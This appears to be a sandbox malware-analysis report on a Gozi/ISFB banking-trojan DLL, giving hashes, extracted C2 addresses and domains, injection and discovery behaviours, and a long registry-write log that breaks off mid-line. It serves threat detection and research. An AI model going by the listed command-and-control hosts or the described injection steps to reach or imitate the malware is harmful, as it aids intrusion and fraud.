Analysis
-
max time kernel
150s -
max time network
125s -
platform
windows10-2004_x64 -
resource
win10v2004-20220721-en -
resource tags
arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system -
submitted
03-08-2022 16:03
Static task
static1
Behavioral task
behavioral1
Sample
de00c4750accf516704b8c0df265c24a.dll
Resource
win7-20220715-en
General
-
Target
de00c4750accf516704b8c0df265c24a.dll
-
Size
300KB
-
MD5
de00c4750accf516704b8c0df265c24a
-
SHA1
eddbc6019ec7ba82d3c5b4c59efe797ff1df9f75
-
SHA256
7dae6d6fb339b6114ffdd3c0b6bcaa2c9dab0a73979fec029801e9e16d7d06bc
-
SHA512
b0e6bbbdae36bd81f63dbab9296515d3a389fa6acb397476058ae202e66026ca8dc523fb35c6b7145a87d6e61e3833e396873e61e733152ccbaa39387bada96f
Malware Config
Extracted
gozi_ifsb
3000
config.edge.skype.com
37.120.206.71
37.120.206.84
193.106.191.163
-
base_path
/drew/
-
build
250240
-
exe_type
loader
-
extension
.jlk
-
server_id
50
Extracted
gozi_ifsb
3000
37.120.206.91
37.120.206.95
havefuntxmm.at
5.42.199.57
xerkdeoleone.at
-
base_path
/images/
-
build
250240
-
exe_type
worker
-
extension
.jlk
-
server_id
50
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation mshta.exe -
Suspicious use of SetThreadContext 6 IoCs
Processes:
powershell.exeExplorer.EXEdescription pid process target process PID 3932 set thread context of 3020 3932 powershell.exe Explorer.EXE PID 3020 set thread context of 3448 3020 Explorer.EXE RuntimeBroker.exe PID 3020 set thread context of 3720 3020 Explorer.EXE RuntimeBroker.exe PID 3020 set thread context of 4104 3020 Explorer.EXE RuntimeBroker.exe PID 3020 set thread context of 536 3020 Explorer.EXE RuntimeBroker.exe PID 3020 set thread context of 2616 3020 Explorer.EXE cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Discovers systems in the same network 1 TTPs 3 IoCs
Processes:
net.exenet.exenet.exepid process 1160 net.exe 4036 net.exe 4892 net.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Modifies registry class 64 IoCs
Processes:
RuntimeBroker.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b26a4060-92d1-4d12-b RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b26a4060-92d1-4d12-b = "\\\\?\\Volume{40BEAA24-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\db13e6613606261e295c366b3400b7db9497f7721833709005687624cef2c870" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\da74b967-1d72-46d1-a = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\51143b95-e0b2-4c00-a = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\11f92fce-4a7d-4556-a RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13cad353-7f43-49c5-b = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d9c3e5cc-f402-4e80-9 = "8324" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b26a4060-92d1-4d12-b RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\10ca6057-baf0-4b43-a = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5660f14-860c-4e81-9 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5660f14-860c-4e81-9 = "8324" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\11f92fce-4a7d-4556-a = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000335525a752a7d801d93e8ea752a7d801d93e8ea752a7d801fdae0d000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000035582802000383965343338613332646639326236386261613939613762316638353365396335303136616332663432643237306463646230663232636361306435336632650000b20009000400efbe03558280035582802e000000000000000000000000000000000000000000000000008fe29700380039006500340033003800610033003200640066003900320062003600380062006100610039003900610037006200310066003800350033006500390063003500300031003600610063003200660034003200640032003700300064006300640062003000660032003200630063006100300064003500330066003200650000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000004dfc161e1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c38396534333861333264663932623638626161393961376231663835336539633530313661633266343264323730646364623066323263636130643533663265000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006c6e7966676568690000000000000000387ed046496cf24ab3ec677917a3d8645d77a322e008ed119262726f482620df387ed046496cf24ab3ec677917a3d8645d77a322e008ed119262726f482620dfce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d0032003600360030003300300038003700370036002d0033003700300035003100350030003000380036002d00320036003500390033003500310035002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000024aabe40000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13cad353-7f43-49c5-b = 4de967a852a7d801 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\dddedab3-0d57-46a6-8 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\dddedab3-0d57-46a6-8 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d62eb4a-b3b9-4465-8 = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\51143b95-e0b2-4c00-a = f1f395a652a7d801 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5660f14-860c-4e81-9 = "\\\\?\\Volume{40BEAA24-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\43062c64cdc78544bd046edef55edfa8170856ee30b98e629b82464899b859a6" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5660f14-860c-4e81-9 = "0" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a47e7349-31b8-48b4-9 = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13cad353-7f43-49c5-b RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5660f14-860c-4e81-9 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d62eb4a-b3b9-4465-8 = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\11f92fce-4a7d-4556-a = "0" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13cad353-7f43-49c5-b = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\dddedab3-0d57-46a6-8 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\dddedab3-0d57-46a6-8 = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\da74b967-1d72-46d1-a = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d9c3e5cc-f402-4e80-9 = 9baac7a852a7d801 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\084ec861-8ea3-4666-8 = "8324" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\51143b95-e0b2-4c00-a RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a47e7349-31b8-48b4-9 = "\\\\?\\Volume{40BEAA24-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\93214ced978b1f3fa5c37bde5aa71302a07ca2e9469b370cc11bc61930803bf3" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\da74b967-1d72-46d1-a = 30ca9fa852a7d801 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\084ec861-8ea3-4666-8 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d62eb4a-b3b9-4465-8 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d62eb4a-b3b9-4465-8 = "\\\\?\\Volume{40BEAA24-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\6d63c6516ae1a7e40eea65da02de168692eb5c3f1bf44f97063858c3198e0171" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b26a4060-92d1-4d12-b = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b26a4060-92d1-4d12-b = "8324" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b26a4060-92d1-4d12-b = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000ea4877a652a7d801ea4877a652a7d801ea4877a652a7d801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000035582802000646231336536363133363036323631653239356333363662333430306237646239343937663737323138333337303930303536383736323463656632633837300000b20009000400efbe03558280035582802e000000000000000000000000000000000000000000000000001669a100640062003100330065003600360031003300360030003600320036003100650032003900350063003300360036006200330034003000300062003700640062003900340039003700660037003700320031003800330033003700300039003000300035003600380037003600320034006300650066003200630038003700300000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000004dfc161e1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c64623133653636313336303632363165323935633336366233343030623764623934393766373732313833333730393030353638373632346365663263383730000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006c6e7966676568690000000000000000387ed046496cf24ab3ec677917a3d8645477a322e008ed119262726f482620df387ed046496cf24ab3ec677917a3d8645477a322e008ed119262726f482620dfce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d0032003600360030003300300038003700370036002d0033003700300035003100350030003000380036002d00320036003500390033003500310035002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000024aabe40000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a47e7349-31b8-48b4-9 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\da74b967-1d72-46d1-a = "\\\\?\\Volume{40BEAA24-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\8b1ea3dafdc11380b50b7cb71940868d9f0ca3e1578253ed3647204878806d8f" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13cad353-7f43-49c5-b = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000d7a133a752a7d8011674a8a752a7d8011674a8a752a7d801678709000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000035582802000366436336336353136616531613765343065656136356461303264653136383639326562356333663162663434663937303633383538633331393865303137310000b20009000400efbe03558280035582802e000000000000000000000000000000000000000000000000007e40b900360064003600330063003600350031003600610065003100610037006500340030006500650061003600350064006100300032006400650031003600380036003900320065006200350063003300660031006200660034003400660039003700300036003300380035003800630033003100390038006500300031003700310000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000004dfc161e1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c36643633633635313661653161376534306565613635646130326465313638363932656235633366316266343466393730363338353863333139386530313731000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006c6e7966676568690000000000000000387ed046496cf24ab3ec677917a3d8645e77a322e008ed119262726f482620df387ed046496cf24ab3ec677917a3d8645e77a322e008ed119262726f482620dfce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d0032003600360030003300300038003700370036002d0033003700300035003100350030003000380036002d00320036003500390033003500310035002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000024aabe40000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d62eb4a-b3b9-4465-8 = 8c676aa652a7d801 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b26a4060-92d1-4d12-b = "0" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\084ec861-8ea3-4666-8 = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\51143b95-e0b2-4c00-a = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\10ca6057-baf0-4b43-a = 3eaaa8a652a7d801 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5660f14-860c-4e81-9 = 0f69c8a652a7d801 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local 